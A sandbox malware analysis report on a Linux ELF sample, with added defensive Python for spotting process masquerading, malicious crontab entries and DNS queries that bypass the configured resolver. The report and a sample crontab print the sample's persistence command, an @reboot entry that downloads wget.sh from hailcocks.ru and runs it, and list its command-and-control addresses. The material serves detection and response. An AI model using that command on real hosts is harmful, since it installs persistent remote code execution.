Malware Analysis Report

2024-11-15 08:22

Sample ID 241028-b6d4saxhnl
Target c84fca197a6c0d8da1e804407643d901.bin
SHA256 39207de2049b011a1f01695db33fec720fb0b7044a2557948cace8e12ddf6dfa
Tags: defense_evasion, discovery, execution, persistence, privilege_escalation

Score: 7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 7/10

SHA256: 39207de2049b011a1f01695db33fec720fb0b7044a2557948cace8e12ddf6dfa

Threat level: shows suspicious behavior

The file c84fca197a6c0d8da1e804407643d901.bin shows suspicious behavior: it installs a cron job, enumerates running processes, rewrites its own process name, sends its DNS query to a server other than the configured resolver, and then connects to 193.233.193.45:7425 (details under Signatures, Processes and Network in behavioral1).

Malicious Activity Summary

defense_evasion, discovery, execution, persistence, privilege_escalation

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Enumerates running processes

Changes its process name

Reads runtime system information

MITRE ATT&CK

Enterprise Matrix V15. Tactics observed: defense_evasion, discovery, execution, persistence, privilege_escalation (the per-signature tactic tags are listed under Signatures in behavioral1).

Analysis: static1

Detonation Overview

Reported

2024-10-28 01:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 01:45

Reported

2024-10-28 01:47

Platform

debian9-armhf-20240611-en

Max time kernel

150s

Max time network

143s

Command Line

[/tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf]

Signatures

File and Directory Permissions Modification

Tactic: defense_evasion

Description | Indicator | Process | Target
N/A | N/A | /bin/sh | N/A

Renames itself

Description | Indicator | Process | Target
N/A | N/A | /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf | N/A

Unexpected DNS network traffic destination

Description | Indicator | Process | Target
Destination IP | 194.36.144.87 | N/A | N/A

Creates/modifies Cron job

Tactics: execution, persistence, privilege_escalation

Description | Indicator | Process | Target
File opened for modification | /var/spool/cron/crontabs/tmp.TxaXvK | /usr/bin/crontab | N/A

Enumerates running processes

No indicator table was recorded for this signature; the per-PID /proc/<pid>/status and /proc/<pid>/cmdline reads listed under Reads runtime system information are the supporting evidence.

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | /bin/sh /etc/init.d/rcS | /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf | N/A

The new name mimics the busybox-style init script runner /etc/init.d/rcS, so the process blends into ps output on the armhf platform it was detonated on. Rewriting argv only changes what /proc/<pid>/cmdline shows; /proc/<pid>/exe still points at the real binary under /tmp.
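
The indicator above is the sample's rewritten cmdline. A check a responder can run on a live host, added here as an example and not part of the sandbox report, compares what a process claims to be (argv[0] and comm) with what /proc/<pid>/exe actually points at, and flags binaries executing from world-writable directories or unlinked after exec. The snapshot it runs on is constructed to mirror this report (PIDs and comm values are invented), and the allowlist of binaries whose argv legitimately differs from their file name (sshd, busybox) is an assumption to tune per fleet.

```python
"""Flag processes whose visible name does not match the binary they run.

Added example, not code from the sandbox report. Overwriting argv (what ps and
/proc/<pid>/cmdline show) and PR_SET_NAME (what /proc/<pid>/comm shows) do not
change /proc/<pid>/exe, which the kernel keeps pointing at the real executable.
"""
import os
from dataclasses import dataclass
from typing import Dict, List, Optional

# Directories a long-lived service should not be executing from.
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Binaries whose argv legitimately differs from their file name: sshd rewrites
# argv to "sshd: user [priv]", busybox is a multi-call binary invoked as "sh",
# "ls" and so on. Assumed allowlist for this example; extend it for your hosts.
NAME_MISMATCH_OK = {"/usr/sbin/sshd", "/bin/busybox"}


@dataclass
class ProcSnapshot:
    pid: int
    exe: str       # target of /proc/<pid>/exe, may end in " (deleted)"
    cmdline: str   # /proc/<pid>/cmdline with NUL separators replaced by spaces
    comm: str      # /proc/<pid>/comm, the name that PR_SET_NAME changes


def snapshot_live(pid: int) -> Optional[ProcSnapshot]:
    """Read one process from a live Linux /proc; None for kernel threads or exited PIDs."""
    base = f"/proc/{pid}"
    try:
        exe = os.readlink(f"{base}/exe")
        with open(f"{base}/cmdline", "rb") as f:
            cmdline = f.read().replace(b"\0", b" ").strip().decode(errors="replace")
        with open(f"{base}/comm") as f:
            comm = f.read().strip()
    except OSError:
        return None
    return ProcSnapshot(pid, exe, cmdline, comm) if cmdline else None


def check_process(p: ProcSnapshot) -> List[str]:
    """Return the reasons a process looks like it is hiding what it runs (empty if clean)."""
    reasons: List[str] = []
    real_path = p.exe.replace(" (deleted)", "")
    exe_base = os.path.basename(real_path)
    argv = p.cmdline.split()
    argv0 = os.path.basename(argv[0].lstrip("-")) if argv else ""  # "-bash" marks a login shell
    if real_path not in NAME_MISMATCH_OK:
        # Symlinked interpreters leave argv0 as a prefix of the real name
        # (python3 -> python3.11), so only a non-prefix counts as a mismatch.
        if not exe_base.startswith(argv0):
            reasons.append(f"argv[0] {argv0!r} does not match exe {exe_base!r}")
        if not exe_base.startswith(p.comm):
            reasons.append(f"comm {p.comm!r} does not match exe {exe_base!r}")
    if p.exe.endswith(" (deleted)"):
        reasons.append("executable was unlinked after exec")
    if real_path.startswith(TEMP_DIRS):
        reasons.append("executable runs from a world-writable temp directory")
    return reasons


def find_masquerading(procs: List[ProcSnapshot]) -> Dict[int, List[str]]:
    """Map PID -> reasons for every process that fails a check."""
    return {p.pid: r for p in procs if (r := check_process(p))}


def scan_live_host() -> Dict[int, List[str]]:
    """Walk /proc on a Linux host (root is needed to read other users' exe links)."""
    procs = []
    for entry in os.listdir("/proc"):
        if entry.isdigit():
            snap = snapshot_live(int(entry))
            if snap:
                procs.append(snap)
    return find_masquerading(procs)


ELF = "/tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf"

# Constructed snapshot modelled on the report (PIDs and comm values are invented).
SAMPLE_PROCS = [
    ProcSnapshot(1, "/sbin/init", "/sbin/init", "init"),
    ProcSnapshot(674, ELF, "/bin/sh /etc/init.d/rcS", "sh"),
    ProcSnapshot(700, "/usr/bin/python3.11", "python3 /opt/agent.py", "python3"),
    ProcSnapshot(701, "/bin/bash", "-bash", "bash"),
    ProcSnapshot(702, "/usr/sbin/sshd", "sshd: root [priv]", "sshd"),
    ProcSnapshot(703, "/bin/busybox", "sh", "sh"),
]

if __name__ == "__main__":
    for pid, reasons in find_masquerading(SAMPLE_PROCS).items():
        print(pid, *reasons, sep="\n  ")
```

On the constructed snapshot only PID 674 is reported, with three reasons: argv[0] and comm both disagree with the exe name, and the binary runs from /tmp. The prefix comparison keeps symlinked interpreters quiet; daemons that rewrite their own argv still need the allowlist, which is why the check is a triage aid rather than a standalone alert.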

Reads runtime system information

Tactic: discovery

Description | Indicator | Process | Target
File opened for reading | /proc/<pid>/status for 39 PIDs (669-682, 685-709) | /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf | N/A
File opened for reading | /proc/<pid>/cmdline for PIDs 1, 2, 665 and 674 | /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf | N/A
File opened for reading | /proc/mounts | /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf | N/A
File opened for reading | /proc/filesystems (recorded twice; two crontab processes are listed under Processes) | /usr/bin/crontab | N/A

Processes

Process tree (parent/child relationship inferred from the recorded command lines; the shell pipeline spawns both crontab invocations):

/tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf
  [/tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf]

    /bin/sh
      [sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

        /usr/bin/crontab
          [crontab -l]

        /usr/bin/crontab
          [crontab -]

The shell command is the persistence mechanism: crontab -l dumps the current user crontab, echo appends an @reboot entry, and crontab - installs the combined text as the new crontab (written first to the temporary file /var/spool/cron/crontabs/tmp.TxaXvK listed under Files). At every boot the entry changes to /tmp, fetches wget.sh from hailcocks.ru with both wget and curl (so the download succeeds when only one of the two is installed), marks it world-executable with chmod 777 and runs it. No connection to hailcocks.ru appears in the Network section: the @reboot entry only fires after a reboot, which the detonation does not include, so the contents of wget.sh are not covered by this report.
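
What this command leaves on disk can be checked by reading the user crontabs back. The following Python, added here as an example and not part of the sandbox report, parses crontab text the way cron does (comments, VAR=value lines, @special and five-field schedules) and scores each entry on the traits of the line installed here: an @reboot schedule, a wget/curl download, a chmod that sets an execute bit, and execution from a world-writable directory. The sample crontab it runs on is constructed; the regular expressions and the two-trait threshold are choices made for this example, not vendor signatures.

```python
"""Find cron entries that fetch and run remote code at boot.

Added example, not code from the sandbox report.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, List

ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
# A wget/curl invocation and the first http(s) URL on its command line.
DOWNLOAD = re.compile(r"\b(?:wget|curl)\b[^|;&]*?(https?://[^\s\"';|&]+)")
# chmod with a symbolic +x, or an octal mode with any execute bit set.
CHMOD_EXEC = re.compile(
    r"\bchmod\s+(?:[ugoa]*\+[rwx]*x[rwx]*|[0-7]?(?:[1357][0-7]{2}|[0-7][1357][0-7]|[0-7]{2}[1357]))\b"
)
WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


@dataclass
class CronEntry:
    line_no: int
    schedule: str
    command: str


def parse_crontab(text: str) -> List[CronEntry]:
    """Split crontab text into (schedule, command) entries, skipping what cron ignores."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        if line.startswith("@"):                    # @reboot, @daily, ...
            schedule, _, command = line.partition(" ")
        else:                                       # min hour dom mon dow command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue                            # malformed; cron rejects it too
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append(CronEntry(n, schedule, command.strip()))
    return entries


def assess(entry: CronEntry) -> List[str]:
    """Reasons an entry looks like a download-and-execute persistence hook."""
    cmd, reasons = entry.command, []
    if entry.schedule == "@reboot":
        reasons.append("runs at every boot (@reboot)")
    urls = list(dict.fromkeys(DOWNLOAD.findall(cmd)))   # dedupe, keep order
    if urls:
        reasons.append("downloads " + ", ".join(urls))
    if CHMOD_EXEC.search(cmd):
        reasons.append("marks a file executable")
    in_writable = any(re.search(rf"\bcd\s+{re.escape(d)}\b", cmd) or f"{d}/" in cmd
                      for d in WRITABLE_DIRS)
    if in_writable or re.search(r"(?:^|[;&|]\s*)\./", cmd):
        reasons.append("works in a world-writable directory or runs ./something")
    return reasons


def suspicious_entries(text: str, min_reasons: int = 2) -> Dict[int, List[str]]:
    """Map crontab line number -> reasons for entries hitting at least min_reasons traits."""
    out = {}
    for e in parse_crontab(text):
        r = assess(e)
        if len(r) >= min_reasons:
            out[e.line_no] = r
    return out


def scan_spool(spool: str = "/var/spool/cron/crontabs") -> Dict[str, Dict[int, List[str]]]:
    """Check every user crontab in the spool directory (root is required on a real host)."""
    results = {}
    for user in sorted(os.listdir(spool)):
        with open(os.path.join(spool, user), errors="replace") as f:
            hits = suspicious_entries(f.read())
        if hits:
            results[user] = hits
    return results


# Constructed crontab: three benign entries plus the line this sample appends.
SAMPLE_CRONTAB = """\
# user crontab (constructed for this example)
SHELL=/bin/sh
MAILTO=""
0 3 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/5 * * * * curl -s https://monitor.example.com/ping
@daily apt-get update
@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
"""

if __name__ == "__main__":
    for line_no, reasons in suspicious_entries(SAMPLE_CRONTAB).items():
        print(f"line {line_no}:", *reasons, sep="\n  ")
```

On the constructed crontab only line 7 (the sample's entry) reaches the threshold, with all four traits; the monitoring curl on line 5 scores a single trait and is reported only when min_reasons is lowered to 1. Run scan_spool() as root to check every user's crontab on a host, and also read /etc/crontab and /etc/cron.d, which this example does not cover.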

Network

Country | Destination | Domain | Proto
DE | 194.36.144.87:53 | kingstonwikkerink.dyn | udp
HK | 193.233.193.45:7425 | kingstonwikkerink.dyn | tcp

The sample sends its DNS query for kingstonwikkerink.dyn to 194.36.144.87:53 rather than to the sandbox's configured resolver (the Unexpected DNS network traffic destination signature above), then opens a TCP connection to 193.233.193.45:7425, which the sandbox records against the same domain. Note that .dyn is not delegated in the ICANN root zone; it is served by alternative-root resolvers such as OpenNIC, which is consistent with the sample carrying its own resolver address. Because the query bypasses the local resolver, resolver logs and passive DNS will not show the name; hunt instead for outbound udp/53 to non-approved resolvers, and block the resolver IP, the domain and the destination IP:port together.
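
A hunt for this pattern on a host or in flow logs is to compare every port-53 destination with the resolvers the host is configured to use, then pull the connections that followed for the same name. The Python below, added as an example and not part of the report, does that over the report's own Network table format and a resolv.conf; the benign deb.debian.org lookup and the sandbox resolver address 10.0.2.3 are constructed assumptions, since the report does not state what resolver the sandbox had configured.

```python
"""Flag DNS traffic that bypasses the configured resolver, and what followed it.

Added example, not code from the sandbox report. Input is the report's own
Network table format ("Country Destination Domain Proto") plus resolv.conf
text; a query sent to any other address on port 53 is flagged and the
non-DNS flows recorded against the same domain are attached as follow-on.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Flow:
    country: str
    dst_ip: str
    dst_port: int
    domain: str
    proto: str


def parse_network_table(text: str) -> List[Flow]:
    """Parse rows like 'DE 194.36.144.87:53 kingstonwikkerink.dyn udp'; the header is skipped."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[1].lower() == "destination":
            continue
        ip, _, port = parts[1].rpartition(":")
        ip = ip.strip("[]")                           # allow [v6]:port
        ipaddress.ip_address(ip)                      # raises ValueError on a bad row
        flows.append(Flow(parts[0], ip, int(port), parts[2], parts[3].lower()))
    return flows


def configured_resolvers(resolv_conf: str) -> set:
    """Nameserver addresses from resolv.conf text, ignoring comments and other keywords."""
    ns = set()
    for line in resolv_conf.splitlines():
        fields = line.split("#", 1)[0].split(";", 1)[0].split()
        if len(fields) >= 2 and fields[0] == "nameserver":
            ns.add(str(ipaddress.ip_address(fields[1])))
    return ns


def unexpected_dns(flows: List[Flow], resolvers: set) -> List[Dict]:
    """Port-53 flows to non-configured resolvers, each with the later flows for that domain."""
    findings = []
    for i, f in enumerate(flows):
        if f.dst_port != 53 or f.dst_ip in resolvers:
            continue
        follow_on = [f"{g.dst_ip}:{g.dst_port}/{g.proto}"
                     for g in flows[i + 1:] if g.domain == f.domain and g.dst_port != 53]
        findings.append({"resolver": f.dst_ip, "proto": f.proto,
                         "domain": f.domain, "follow_on": follow_on})
    return findings


# Constructed from the report's Network table, plus one benign lookup through the
# sandbox resolver. The resolver address 10.0.2.3 is assumed; the report does not state it.
NETWORK_TABLE = """\
Country Destination Domain Proto
N/A 10.0.2.3:53 deb.debian.org udp
DE 194.36.144.87:53 kingstonwikkerink.dyn udp
HK 193.233.193.45:7425 kingstonwikkerink.dyn tcp
"""
RESOLV_CONF = "# constructed\nnameserver 10.0.2.3\nsearch localdomain\n"

if __name__ == "__main__":
    hits = unexpected_dns(parse_network_table(NETWORK_TABLE), configured_resolvers(RESOLV_CONF))
    for hit in hits:
        print(hit)
```

On the constructed input the lookup through 10.0.2.3 is ignored and one finding is produced: resolver 194.36.144.87 for kingstonwikkerink.dyn, with 193.233.193.45:7425/tcp as the follow-on connection. The same logic applies unchanged to Zeek or NetFlow records once they are mapped onto the Flow fields.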

Files

/var/spool/cron/crontabs/tmp.TxaXvK
Temporary file that crontab - writes the new table to before installing it as the user's crontab; the hashes below are of that file.

MD5    166013c72061a26359c4b71ea7e3f82c
SHA1   22f63cee554a4e6dade457c043fb687d6843b9e7
SHA256 9ae205f20ff39c525193c69898b9fb677905ed2e6b9de9a42311135923fe96fe
SHA512 bf5812345971eed2131e77131faccf5a779ebb92bb2b628c056fa339a0d714cba6fd370b5d0db55c439eac4833d9a097867167cfb0c5c70368a5b2563b1fdc06